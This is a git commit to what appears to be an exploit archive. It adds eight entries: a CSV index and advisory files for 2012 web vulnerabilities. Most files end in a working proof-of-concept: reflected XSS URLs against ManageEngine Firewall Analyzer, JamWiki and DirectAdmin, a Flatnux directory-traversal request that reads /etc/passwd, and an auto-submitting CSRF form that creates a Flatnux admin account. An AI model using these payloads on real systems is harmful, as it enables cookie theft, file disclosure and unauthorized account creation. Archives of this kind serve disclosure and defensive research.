DB: 2015-05-18

8 new exploits
2015-05-18 05:03:27 +00:00 · 2015-05-18 05:03:27 +00:00 · 2be48e03b5
commit 2be48e03b5
parent 57c0ae8e73
9 changed files with 128 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -33411,3 +33411,11 @@ id,file,description,date,author,platform,type,port
 37025,platforms/php/webapps/37025.txt,"PHP Designer 2007 - Personal Multiple SQL Injection Vulnerabilities",2012-03-30,MR.XpR,php,webapps,0
 37026,platforms/php/webapps/37026.txt,"e107 1.0 'view' Parameter SQL Injection Vulnerability",2012-03-30,Am!r,php,webapps,0
 37027,platforms/php/webapps/37027.txt,"Simple Machines Forum (SMF) 2.0.2 index.php scheduled Parameter XSS",2012-03-29,Am!r,php,webapps,0
+37028,platforms/php/webapps/37028.txt,"JamWiki 1.1.5 'num' Parameter Cross Site Scripting Vulnerability",2012-03-30,"Sooraj K.S",php,webapps,0
+37029,platforms/java/webapps/37029.txt,"ManageEngine Firewall Analyzer 7.2 fw/index2.do Multiple Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
+37030,platforms/java/webapps/37030.txt,"ManageEngine Firewall Analyzer 7.2 fw/createAnomaly.do subTab Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
+37031,platforms/java/webapps/37031.txt,"ManageEngine Firewall Analyzer 7.2 fw/mindex.do url Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
+37032,platforms/java/webapps/37032.txt,"ManageEngine Firewall Analyzer 7.2 fw/syslogViewer.do port Parameter XSS",2012-04-01,"Vulnerability Research Laboratory",java,webapps,0
+37033,platforms/java/webapps/37033.txt,"JBMC Software DirectAdmin 1.403 'domain' Parameter Cross Site Scripting Vulnerability",2012-04-02,"Dawid Golak",java,webapps,0
+37034,platforms/php/webapps/37034.txt,"FlatnuX CMS controlcenter.php contents/Files Action dir Parameter Traversal Arbitrary File Access",2012-04-01,"Vulnerability Laboratory",php,webapps,0
+37035,platforms/php/webapps/37035.html,"FlatnuX CMS Admin User Creation CSRF",2012-04-01,"Vulnerability Laboratory",php,webapps,0
--- a/platforms/java/webapps/37029.txt
+++ b/platforms/java/webapps/37029.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52841/info
+
+Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/fw/index2.do?url=adminHome&tab=system%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3El 
--- a/platforms/java/webapps/37030.txt
+++ b/platforms/java/webapps/37030.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/52841/info
+ 
+Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+ 
+Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. 
+
+http://www.example.com.com/fw/createAnomaly.do?subTab=%22%3E%3Cscript%3Ealert%281337%29%3C/script%3EaddAlert&;
+tab=alert%22%3E%3Cscript%3Ealert%28vlab%29%3C/script%3E&demoConfigure=true 
--- a/platforms/java/webapps/37031.txt
+++ b/platforms/java/webapps/37031.txt
@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/52841/info
+  
+Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+  
+Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/fw/mindex.do?url=%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3EliveReportDash%22%3E
+%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3E&subTab=%22%3E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3Elive&tab=%22%3
+E%3Cscript%3Ealert%28%27vlab%27%29%3C/script%3Ereport 
--- a/platforms/java/webapps/37032.txt
+++ b/platforms/java/webapps/37032.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52841/info
+   
+Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+   
+Firewall Analyzer 7.2 is affected; other versions may also be vulnerable. 
+
+http://www.example.com/fw/syslogViewer.do?port=%22%3E%3Cscript%3Ealert%28vlab%29%3C/script%3E 
--- a/platforms/java/webapps/37033.txt
+++ b/platforms/java/webapps/37033.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52845/info
+
+DirectAdmin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+DirectAdmin 1.403 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/CMD_DOMAIN?action=create&domain=<div style="border:1px solid red;width:300px;height:300px" onmouseover="alert(dawid)"></div>aaa.pl&ubandwidth=unlimited&uquota=unlimited&cgi=ON&php=ON 
--- a/platforms/php/webapps/37028.txt
+++ b/platforms/php/webapps/37028.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/52829/info
+
+JamWiki is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+JamWiki 1.1.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/jamwiki/en/Special:AllPages?num=[XSS] 
--- a/platforms/php/webapps/37034.txt
+++ b/platforms/php/webapps/37034.txt
@ -0,0 +1,23 @@
+source: http://www.securityfocus.com/bid/52846/info
+
+Flatnux is prone to multiple security vulnerabilities:
+
+1. An HTML-injection vulnerability
+2. A cross-site request-forgery vulnerability
+3. A directory-traversal vulnerability
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, obtain sensitive information, or control how the site is rendered to the user. Other attacks are also possible.
+
+The following versions are vulnerable:
+
+Flatnux 2011-08.09.2
+Flatnux 2011-2012-01.03.3
+Flatnux 2011-minimal-2012-01.03.3
+Fncommerce 2010-08-09-no-db
+Fncommerce 2010-08-09-no-sample-data
+Fncommerce 2010-08-09-with-sample-data
+Fncommerce 2010-12-17-no-db
+Fncommerce 2010-12-17-no-sample-data
+Fncommerce 2010-12-17-with-sample-data 
+
+http://www.example.com/flatnux/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
--- a/platforms/php/webapps/37035.html
+++ b/platforms/php/webapps/37035.html
@ -0,0 +1,40 @@
+source: http://www.securityfocus.com/bid/52846/info
+ 
+Flatnux is prone to multiple security vulnerabilities:
+ 
+1. An HTML-injection vulnerability
+2. A cross-site request-forgery vulnerability
+3. A directory-traversal vulnerability
+ 
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials, obtain sensitive information, or control how the site is rendered to the user. Other attacks are also possible.
+ 
+The following versions are vulnerable:
+ 
+Flatnux 2011-08.09.2
+Flatnux 2011-2012-01.03.3
+Flatnux 2011-minimal-2012-01.03.3
+Fncommerce 2010-08-09-no-db
+Fncommerce 2010-08-09-no-sample-data
+Fncommerce 2010-08-09-with-sample-data
+Fncommerce 2010-12-17-no-db
+Fncommerce 2010-12-17-no-sample-data
+Fncommerce 2010-12-17-with-sample-data 
+
+<html>
+<form  name="test" 
+action="http://www.example.com/flatnux/controlcenter.php?page___xdb_fn_users=1&order___xdb_fn_users=username&desc___xdb_fn_users=&op___xdb_fn_users=insnew&page___
+xdb_fn_users=&op=editdata&opt=utilities/xmldb_admin&t=fn_users" method="post">
+<input type="hidden" name="username" value="csrf"><br/>
+<input type="hidden" name="email" value="csrf () hotmail com"><br/>
+<input type="hidden" name="passwd" value="186911"><br/>
+<input type="hidden" name="passwd_retype" value="186911"><br/>
+<input type="hidden" name="name" value="csrf"><br/>
+<input type="hidden" name="surname" value="Mr"><br/>
+<input type="hidden" name="link" value="http"><br/>
+<input type="hidden" name="avatarimage" value=""><br/>
+<input type="hidden" name="avatar" value=""><br/>
+<input type="hidden" name="save___xdb_fn_users" value="__xdb_fn_users"><br\>
+<input type="hidden" name="activ" value=1><br/>
+</form>
+<script>document.test.submit();</script>
+</html>